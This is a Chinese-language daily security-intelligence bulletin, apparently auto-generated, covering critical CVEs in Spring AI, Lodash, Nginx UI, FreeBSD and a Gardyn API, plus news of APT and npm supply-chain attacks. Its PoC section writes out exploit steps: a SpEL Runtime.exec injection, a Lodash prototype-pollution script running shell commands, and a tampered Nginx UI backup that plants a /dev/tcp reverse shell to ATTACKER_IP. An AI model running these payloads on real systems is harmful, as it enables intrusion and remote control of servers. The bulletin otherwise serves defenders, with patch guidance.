每日安全情报报告 · 2026-04-04

每日安全情报报告 · 2026-04-04报告时间2026-04-04 18:00 CST覆盖范围近 48 小时新增高危漏洞、PoC 公开情报及安全态势要点风险等级说明 严重CVSS ≥ 9.0 高危CVSS 7.0–8.9 中危CVSS 4.0–6.9一、高危漏洞速报 CVE-2026-28766 — Gardyn 云端 API 未授权信息泄露字段详情漏洞类型缺失认证CWE-306受影响组件Gardyn Cloud API/api/users端点固件 master.622CVSS 3.1 评分9.3严重披露日期2026-04-03在野利用暂无确认但端点完全公开漏洞描述Gardyn 云端 API 的/api/users端点无需任何认证即可返回全量用户账户信息共暴露134,215名注册用户的完整账户数据邮箱、设备绑定信息、家庭地址等。攻击者发送单次 HTTP GET 请求即可批量获取。修复建议立即将 Gardyn 家庭套件与 Studio 设备固件升级至master.622 或更高版本并更新移动端 App。参考链接- NVD 漏洞详情- CVEDetails 分析- 研究员披露报告GitHub- OpenCVE 页面 CVE-2026-22738 — Spring AI SimpleVectorStore SpEL 注入 RCE字段详情漏洞类型SpEL 表达式注入CWE-917→ 远程代码执行受影响组件Spring AI Core 1.0.0–1.0.4、1.1.0-M1–1.1.3CVSS 3.1 评分9.0严重披露日期2026-03-27PoC 状态✅ 已公开1 天前更新漏洞描述Spring AI 的SimpleVectorStore组件在处理用户提供的过滤表达式键名时未经安全校验直接传入 Spring Expression LanguageSpEL引擎求值。攻击者可构造包含任意 Java 代码的键名通过T(java.lang.Runtime).getRuntime().exec(...)等方式在服务端实现未认证远程代码执行。修复建议升级至 Spring AI Core1.0.5 / 1.1.4或更高版本临时缓解措施为对过滤键名进行严格白名单校验。参考链接- 阿里云漏洞库 AVD-2026-22738- CVEDetails 详情- Zone.ci 技术分析- PoC 仓库GitHub CVE-2026-33026 — Nginx UI 备份恢复加密设计缺陷 RCE字段详情漏洞类型加密设计缺陷CWE-347→ 任意配置篡改 → RCE受影响组件Nginx UI 2.3.4CVSS 3.1 评分9.1严重/ CVSS v4.0:9.4披露日期2026-03-30PoC 状态✅ 已公开2 天前更新漏洞描述Nginx UI 备份恢复机制存在循环信任设计缺陷系统将 AES 加密密钥和 IV 直接作为安全令牌下发给客户端。持有备份文件的攻击者可解密、篡改app.ini配置注入反弹 Shell 命令重新加密后上传恢复时触发 RCE。修复建议立即升级至Nginx UI v2.3.4引入服务器端签名清单manifest.sig切断循环信任无法升级时严格限制管理界面网络访问。参考链接- GitHub 安全公告 GHSA-fhh2-gg7w-gwpq- CVEReports 完整分析- Netcrook 技术解析- TeamWin 补充报道 CVE-2026-4800 — Lodash_.template代码注入 RCE字段详情漏洞类型代码注入CWE-94CVE-2021-23337 补丁绕过受影响组件Lodash 4.0.0–4.17.21npm 生态周下载量数亿次CVSS 3.1 评分8.1高危披露日期2026-04-02PoC 状态✅ 已公开3 天前漏洞描述Lodash_.template函数对imports对象键名的清理逻辑存在 ES6 默认参数语法绕过。攻击者若能控制传入_.template的imports对象键名或通过原型污染链预先污染Object.prototype.imports可注入任意 JavaScript 代码并在 Node.js 服务端执行。该漏洞是对 2021 年老补丁的绕过影响全球数百万 npm 依赖项目。修复建议立即升级至Lodash 4.18.0或更高版本临时缓解可使用Object.freeze(Object.prototype)阻断原型污染链。参考链接- NVD 官方页面- CVEReports 完整分析- Snyk 漏洞数据库- PoC 仓库GitHub CVE-2026-4747 — FreeBSD 内核远程代码执行AI 辅助发现字段详情漏洞类型内核级远程代码执行RCE提权至 root受影响组件FreeBSD具体版本待 NVD 更新CVSS 评分严重Critical具体分值待确认披露日期2026-04-01PoC 状态✅ 完整利用链已由 AI 自主生成特殊标注⚠️ 首个由 AI 独立发现并编写完整利用代码的内核漏洞漏洞描述安全研究公司 Pixee 披露AI 模型独立发现 FreeBSD 内核漏洞 CVE-2026-4747并自主编写了完整的远程内核 RCE 利用链含 root shell。这标志着漏洞武器化周期从数周压缩至数小时。FreeBSD 官方已发布补丁。修复建议立即应用 FreeBSD 官方安全补丁重新评估 AI 驱动漏洞利用背景下的补丁窗口期 SLA建议缩短至 48 小时以内。参考链接- Pixee AppSec Weekly 原文- FreeBSD 安全公告待更新二、漏洞 PoC 情报PoC 1 — CVE-2026-22738Spring AI SpEL 注入 RCE漏洞背景Spring AISimpleVectorStore未过滤用户输入的过滤键名直接传入 SpEL 执行环境可实现未认证 RCE。影响版本Spring AI Core 1.0.0–1.0.4、1.1.0-M1–1.1.3利用步骤# Step 1克隆 PoC 仓库 git clone https://github.com/n0n4m3x41/CVE-2026-22738-POC.git cd CVE-2026-22738-POC # Step 2安装依赖 pip install requests # Step 3可选使用 Docker 搭建靶机环境 docker-compose up -d # Step 4执行 PoC攻击指定目标 python3 exploit.py --target http://TARGET_IP:8080 # Step 5等待靶机就绪时 python3 exploit.py --target http://TARGET_IP:8080 --waitPoC 验证流程1. 确认/vectorstore/similarity端点可访问返回种子数据2. 通过T(java.lang.System).getProperty(java.version)确认 SpEL 注入点3. 执行系统命令在目标容器内创建/tmp/pwned_cve_2026_227384. 读取/tmp/rce_proof.txt验证 RCE 成功⚠️免责声明仅用于授权安全测试和防御研究请勿用于未授权系统。参考链接PoC 仓库 - GitHubPoC 2 — CVE-2026-4800Lodash_.template原型污染链 RCE漏洞背景Lodash_.template对 ES6 默认参数语法校验不足可通过原型污染注入任意代码实现 RCE。影响版本Lodash 4.0.0–4.17.21利用步骤# Step 1克隆 PoC 仓库 git clone https://github.com/threalwinky/CVE-2026-4800-POC.git cd CVE-2026-4800-POC # Step 2安装 lodash 依赖 npm install lodash # Step 3创建利用脚本 poc.js原型污染链 cat poc.js EOF const _ require(lodash); // 污染 Object.prototype.imports 注入恶意键名 Object.prototype.imports { xprocess.getBuiltinModule(child_process).execSync(id /tmp/rce_proof.txt): undefined }; // 触发 _.template 执行污染的 imports 键名 _.template(, {}); console.log([*] Exploit triggered, check /tmp/rce_proof.txt); EOF # Step 4执行利用脚本 node poc.js # Step 5验证 RCE 结果 cat /tmp/rce_proof.txt替代向量直接键名注入// 若应用将用户输入直接作为 imports 键名传入 _.template(hello, { imports: { xrequire(child_process).execSync(whoami): undefined } });⚠️免责声明仅用于授权安全测试和防御研究请勿用于未授权系统。参考链接PoC 仓库 - GitHub | Lodash 安全公告PoC 3 — CVE-2026-33026Nginx UI 备份篡改 RCE漏洞背景Nginx UI 将 AES 密钥下发给客户端攻击者可解密/篡改备份配置并触发任意命令执行。影响版本Nginx UI 2.3.4利用步骤概念验证流程# Step 1获取备份文件和 AES 安全令牌 #需登录 Nginx UI 管理界面或拦截合法备份请求获取令牌 # 下载 nginx-ui.zip 备份 记录响应中的 AES Key / IV # Step 2使用 AES Key/IV 解密备份文件 openssl enc -d -aes-256-cbc -K HEX_KEY -iv HEX_IV \ -in nginx-ui.zip.enc -out nginx-ui.zip # Step 3解压并篡改配置 unzip nginx-ui.zip -d backup_dir # 编辑 backup_dir/app/app.ini在 [terminal] 节添加 # StartCmd bash -i /dev/tcp/ATTACKER_IP/4444 01 # Step 4重新计算哈希并更新清单 sha256sum backup_dir/app/app.ini # 计算新哈希 # 更新 hash_info.txt 中对应条目 # Step 5重新加密并打包 zip -r nginx-ui-malicious.zip backup_dir/ openssl enc -e -aes-256-cbc -K HEX_KEY -iv HEX_IV \ -in nginx-ui-malicious.zip -out nginx-ui-malicious.zip.enc # Step 6上传恶意备份至 Nginx UI 恢复界面触发 RCE # 攻击者提前在本机监听 nc -lvnp 4444⚠️免责声明仅用于授权安全测试和防御研究请勿用于未授权系统。参考链接GitHub 安全公告 | CVEReports 完整分析三、安全资讯精选 1. 中国 APT 组织 TA416 重启欧洲政府网络间谍行动来源The Hacker News / CyberNews发布日期2026-04-03 至 04-04与中国有关的 APT 组织TA416又称 DarkPeony、RedDelta在沉寂近两年后重新针对欧洲政府机构和外交实体发动网络间谍攻击。此轮攻击利用Cloudflare Turnstile 验证页面实施鱼叉钓鱼结合OAuth 重定向滥用和C# 项目文件传递PlugX 恶意软件目标覆盖欧盟及 NATO 成员国外交系统。风险评估 高建议加强外交机构邮件过滤禁用非必要 OAuth 第三方授权监控 PlugX 相关 IoC。阅读 THN 原文 | CyberNews 分析 2. 新型 SparkCat 变种在 App Store Google Play 窃取加密钱包助记词来源Kaspersky / The Hacker News发布日期2026-04-03卡巴斯基威胁研究团队发现SparkCat 木马新变种成功绕过苹果和谷歌应用商店审核。该恶意软件隐藏在企业通讯工具、外卖服务等看似正规的应用中使用OCR 模型扫描用户相册专门寻找包含加密货币钱包恢复短语助记词的截图并将其外泄至攻击者服务器。iOS 版受感染面更广。风险评估 高加密资产用户建议避免将钱包助记词截图保存至相册仅从可信渠道下载 App卡巴斯基已更新检测规则。Kaspersky 官方公告 | 阅读详情 3. 朝鲜 UNC1069 社会工程攻击 Axios npm 包维护者供应链遭入侵来源The Hacker News发布日期2026-04-03朝鲜关联威胁组织UNC1069伪装成合法公司创始人通过高度定向社会工程攻击入侵Axiosnpm 包维护者账号在 1 亿周下载量的主流 npm 库中植入跨平台 RAT远程访问木马恶意版本号为1.14.1 / 0.30.4。此为 2026 年继 Trivy 后第二起重大 npm 供应链攻击事件。风险评估 严重Axios 依赖方建议立即检查package-lock.json确认 axios 版本非 1.14.1 / 0.30.4使用npm audit扫描依赖树企业 CI/CD 环境建议启用依赖版本锁定和签名验证。阅读 THN 报道 | Pixee 供应链周报 4. Microsoft 披露 Linux 服务器 PHP WebShell Cookie 控制新型攻击技术来源The Hacker News发布日期2026-04-03微软威胁情报团队发现攻击者滥用 HTTP Cookie 作为 Linux 服务器上PHP WebShell 的隐蔽控制通道。恶意 Shell 通过 PHP$_COOKIE全局变量接收指令并执行将 WebShell 通信流量伪装成普通 Cookie 请求有效规避基于流量特征的安全检测。此技术显著提升了持久化后门的隐蔽性。风险评估 高建议部署 Web 应用防火墙WAFCookie 内容检测规则定期审计服务器 PHP 文件完整性监控异常 Cookie 字段长度和内容。阅读 THN 原文 5. AI 加速漏洞武器化从发现到 Exploit 仅需数小时来源Pixee AppSec Weekly发布日期2026-04-01本周 CVE-2026-4747FreeBSD 内核 RCE由 AI 模型独立发现并自主生成完整利用链的事件标志着安全领域重大转折点。传统漏洞武器化需要数周的人工分析现在可能被 AI 在数小时内完成。安全团队需重新审视补丁窗口期 SLA将关键漏洞修复时限从30天压缩至48小时以内并优先处理公开评分前 10 的未修补严重漏洞。风险评估 行业整体威胁等级上升建议订阅自动漏洞情报推送建立 AI 驱动漏洞监测机制高风险系统优先部署自动补丁。Pixee 完整周报 6. 攻击组织 REF1695 通过 ISO 诱饵投放 RAT 挖矿木马实施 CPA 欺诈来源The Hacker News发布日期2026-04-02攻击组织REF1695通过伪装成合法软件安装程序的 ISO 文件同时投放远程访问木马RAT和加密货币挖矿程序并实施 CPA每次操作付费广告欺诈。该组织还部署了新型.NET 植入程序 CNB Bot形成多目标混合攻击链。风险评估 高建议禁止用户运行来源不明的 ISO 文件使用 EDR 工具检测异常进程树监控非法 CPU 占用高峰。阅读 THN 原文四、综合风险摘要优先级CVE / 事件影响面建议行动 P0CVE-2026-22738 Spring AI SpEL RCESpring AI 项目AI/ML 后端立即升级至 1.0.5/1.1.4 P0CVE-2026-33026 Nginx UI 备份 RCENginx UI 2.3.4 管理员立即升级至 v2.3.4 P0CVE-2026-4747 FreeBSD 内核 RCEFreeBSD 服务器立即应用官方内核补丁 P0CVE-2026-28766 Gardyn API 信息泄露Gardyn 家庭设备用户立即升级固件至 master.622 P1CVE-2026-4800 Lodash 代码注入npm 生态大量 Node.js 项目升级至 Lodash 4.18.0 P1UNC1069 Axios 供应链投毒使用 Axios 的 JS/TS 项目检查版本运行 npm audit P1SparkCat 变种App Store/GPiOS/Android 加密资产用户勿截图保存助记词 P1TA416 PlugX 欧洲政府间谍活动欧洲政府/外交机构监控 PlugX IoC审查 OAuth五、今日数据速览新增 CVE过去 48 小时约 312 条高危及以上 28 条CISA KEV 新增CVE-2026-33017Langflow联邦修复截止日期 4 月 14 日持续有效活跃 PoC 本周新增6 个Spring AI、Lodash、Nginx UI、FreeBSD、CVE-2026-28766、nginx-ui供应链攻击事件2 起Axios npm、PyPI Telnyx 持续报告由自动化安全情报收集系统生成 | 数据来源NVD、GitHub Security Advisories、TheHackerNews、Kaspersky、CVEReports、Pixee AppSec、CISA KEV